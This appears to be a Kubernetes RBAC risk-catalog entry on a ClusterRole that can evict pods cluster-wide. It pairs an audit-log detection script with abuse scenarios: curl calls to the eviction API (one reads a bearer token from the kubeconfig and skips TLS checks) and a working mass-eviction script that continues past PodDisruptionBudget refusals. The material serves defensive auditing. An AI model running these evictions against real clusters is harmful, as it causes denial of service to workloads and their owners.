Evict Pods cluster-wide
Denial of Service
Medium
Overview
Field | Value |
---|---|
ID | 1057 |
Name | Evict Pods cluster-wide |
Risk Category | Denial of Service |
Risk Level | Medium |
Role Type | ClusterRole |
API Groups | policy |
Resources | pods/eviction |
Verbs | create |
Tags | DenialOfService WorkloadLifecycle |
Description
Permits creating Eviction objects for pods in any namespace (the `pods/eviction` subresource in the `policy` API group). The API server turns each accepted eviction into a pod deletion, so a principal holding this permission can remove every pod in the cluster one request at a time without holding `delete` on `pods`. Pods owned by a Deployment, StatefulSet or DaemonSet are recreated by their controller, but the restart still interrupts service, and bare pods with no owner are simply gone. Unlike a direct delete, eviction honors PodDisruptionBudgets: a request that would breach a PDB is refused with HTTP 429 instead of executed, so workloads without a PDB are the ones this permission can take down immediately. Because the grant is a ClusterRole bound cluster-wide, the blast radius is every namespace, not one.
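The defender's check for this permission, added here as an example and not part of the catalog entry: the API server audit log records every eviction as a `create` on resource `pods` with `subresource` `eviction`, so a burst of such events from one principal across several namespaces is the signature of this ClusterRole being abused. The audit lines below are constructed for the example; their field order (`verb`, then `user`, then `objectRef`, then `responseStatus`) matches a real audit event, which is what the `sed` extraction relies on. A production pipeline would use `jq` instead of `sed`; plain POSIX tools are used so the block runs anywhere.

```shell
#!/bin/sh
# Added example: summarise pods/eviction create events from a Kubernetes
# audit log in JSON-lines form. The four events below are constructed:
# three eviction creates by one service account (one refused by a PDB)
# and one unrelated pod get.
SAMPLE_AUDIT=$(cat <<'EOF'
{"kind":"Event","apiVersion":"audit.k8s.io/v1","verb":"create","user":{"username":"system:serviceaccount:ci:runner"},"objectRef":{"resource":"pods","namespace":"default","name":"web-1","subresource":"eviction","apiGroup":""},"responseStatus":{"metadata":{},"code":201}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","verb":"create","user":{"username":"system:serviceaccount:ci:runner"},"objectRef":{"resource":"pods","namespace":"payments","name":"api-0","subresource":"eviction","apiGroup":""},"responseStatus":{"metadata":{},"code":429}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","verb":"get","user":{"username":"alice"},"objectRef":{"resource":"pods","namespace":"default","name":"web-1","apiGroup":""},"responseStatus":{"metadata":{},"code":200}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","verb":"create","user":{"username":"system:serviceaccount:ci:runner"},"objectRef":{"resource":"pods","namespace":"payments","name":"api-1","subresource":"eviction","apiGroup":""},"responseStatus":{"metadata":{},"code":201}}
EOF
)

# Reduce audit events on stdin to one "username namespace http_code" line per
# eviction create. Both greps must match, so key order inside the JSON does
# not matter for the filter; the sed extraction assumes user precedes
# objectRef precedes responseStatus, as in a real audit event.
eviction_events() {
  grep '"subresource":"eviction"' | grep '"verb":"create"' |
    sed -n 's/.*"username":"\([^"]*\)".*"namespace":"\([^"]*\)".*"code":\([0-9]*\).*/\1 \2 \3/p'
}

# Number of eviction creates issued by the principal named in $1.
evictions_by_user() {
  eviction_events | awk -v u="$1" '$1 == u { n++ } END { print n + 0 }'
}

# Number of distinct namespaces the principal in $1 evicted from. One
# principal touching many namespaces is the cluster-wide pattern this
# ClusterRole enables; a namespaced Role could not produce it.
namespaces_hit_by_user() {
  eviction_events | awk -v u="$1" '$1 == u { ns[$2] = 1 } END { c = 0; for (k in ns) c++; print c }'
}

# Evictions the API server refused with 429: a PodDisruptionBudget held.
# These still show intent even though no pod was removed.
blocked_by_pdb() {
  eviction_events | awk '$3 == 429 { n++ } END { print n + 0 }'
}

# Stand-alone demo over the constructed sample.
printf '%s\n' "$SAMPLE_AUDIT" | eviction_events
printf 'evictions by ci runner: %s\n' "$(printf '%s\n' "$SAMPLE_AUDIT" | evictions_by_user system:serviceaccount:ci:runner)"
printf 'namespaces hit: %s\n'       "$(printf '%s\n' "$SAMPLE_AUDIT" | namespaces_hit_by_user system:serviceaccount:ci:runner)"
printf 'blocked by PDB: %s\n'       "$(printf '%s\n' "$SAMPLE_AUDIT" | blocked_by_pdb)"
```

Run it against a real log with `eviction_events < /var/log/kubernetes/audit.log` (the path depends on the audit policy and backend configured on the control plane); an alert threshold on `evictions_by_user` per time window, combined with `namespaces_hit_by_user` greater than one, separates normal node maintenance by a drain tool from a principal sweeping the cluster.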
Abuse Scenarios
- Evict all pods from a specific node, causing disruption. Note that `kubectl drain` cordons the node and lists its pods before evicting them, so besides `create` on `pods/eviction` it needs at least `patch` on `nodes` and `list` on `pods`; with only the eviction permission, pod names must already be known and are evicted one by one through the API (next scenario).
kubectl drain <node-name> --ignore-daemonsets --delete-emptydir-data
# Example: kubectl drain minikube --ignore-daemonsets --delete-emptydir-data
- Evict a specific pod by directly calling the eviction API. A 2xx response with a `Status` of `Success` means the pod is being deleted; 429 Too Many Requests means a PodDisruptionBudget blocked it (retry later, or target pods that have no PDB); 403 means the binding does not cover that namespace or resource.
# Replace <kubernetes-api-server> with your API server address
# Replace <token> with your authentication token
# -k skips TLS verification; use --cacert with the cluster CA instead when you have it
curl -k -H "Authorization: Bearer <token>" -H "Content-Type: application/json" -X POST \
--data '{"apiVersion":"policy/v1","kind":"Eviction","metadata":{"name":"<pod-name>","namespace":"<namespace>"}}' \
https://<kubernetes-api-server>/api/v1/namespaces/<namespace>/pods/<pod-name>/eviction
# Example (assumes the kubeconfig user entry carries a static bearer token):
curl -k -H "Authorization: Bearer $(awk '/token:/{print $2}' ~/.kube/config)" \
-H "Content-Type: application/json" -X POST \
--data '{"apiVersion":"policy/v1","kind":"Eviction","metadata":{"name":"my-app-pod-xyz","namespace":"default"}}' \
https://127.0.0.1:6443/api/v1/namespaces/default/pods/my-app-pod-xyz/eviction
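The two scenarios above combined into one script, added here as an example and not part of the catalog entry: it builds the Eviction body and subresource URL the same way the curl command does, classifies the API server's HTTP status (success, PDB block, forbidden) so a loop can react instead of stopping on the first 429, and evicts a list of `namespace pod` pairs read from stdin. Assumed: `curl` on PATH, the API server address in `APISERVER`, a bearer token in `TOKEN`, and that the caller obtains the pod list some other way (the `kubectl get pods` line in the comment needs `list` on `pods`, which this ClusterRole alone does not grant). The functions that touch the network are the only ones that need a cluster; the builders and the classifier run offline.

```shell
#!/bin/sh
# Added example: mass eviction through the pods/eviction subresource using
# only create on pods/eviction. Assumptions: APISERVER and TOKEN are set in
# the environment and curl is available.
APISERVER="${APISERVER:-https://127.0.0.1:6443}"
TOKEN="${TOKEN:-}"

# Eviction body for pod $2 in namespace $1 (policy/v1, as in the curl call).
eviction_body() {
  printf '{"apiVersion":"policy/v1","kind":"Eviction","metadata":{"name":"%s","namespace":"%s"}}' "$2" "$1"
}

# Subresource URL on server $1 for pod $3 in namespace $2.
eviction_url() {
  printf '%s/api/v1/namespaces/%s/pods/%s/eviction' "$1" "$2" "$3"
}

# Map the HTTP status of an eviction request to an outcome the loop can act on.
classify_eviction() {
  case "$1" in
    200|201) echo evicted ;;
    429) echo blocked-by-pdb ;;      # a PodDisruptionBudget would be violated; retry later
    403) echo forbidden ;;           # binding does not cover this namespace
    404) echo not-found ;;           # pod already gone or name guessed wrong
    500) echo pdb-misconfigured ;;   # e.g. more than one PDB selects the pod
    *)   echo "unexpected-$1" ;;
  esac
}

# Evict one pod: prints "ns/pod: outcome", returns 0 only when evicted.
# -k skips TLS verification; replace with --cacert <ca.crt> when available.
evict_pod() {
  ns=$1; pod=$2
  code=$(curl -sk -o /dev/null -w '%{http_code}' \
    -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
    -X POST --data "$(eviction_body "$ns" "$pod")" \
    "$(eviction_url "$APISERVER" "$ns" "$pod")")
  outcome=$(classify_eviction "$code")
  echo "$ns/$pod: $outcome"
  [ "$outcome" = evicted ]
}

# Evict every "namespace pod" pair on stdin and keep going past failures.
# A suitable input, when list on pods is also held, is:
#   kubectl get pods -A --field-selector spec.nodeName=<node> \
#     -o jsonpath='{range .items[*]}{.metadata.namespace}{" "}{.metadata.name}{"\n"}{end}'
evict_listed_pods() {
  while read -r ns pod; do
    if [ -n "$pod" ]; then
      evict_pod "$ns" "$pod" || true
    fi
  done
}

# Stand-alone usage (only reaches the network when TOKEN is set):
#   printf 'default my-app-pod-xyz\npayments api-0\n' | evict_listed_pods
if [ -n "$TOKEN" ]; then
  printf 'default my-app-pod-xyz\n' | evict_listed_pods
fi
```

Pods refused with `blocked-by-pdb` are exactly the workloads whose owners configured a PodDisruptionBudget; everything reported `evicted` had none, which is the inventory a defender should produce before an attacker does.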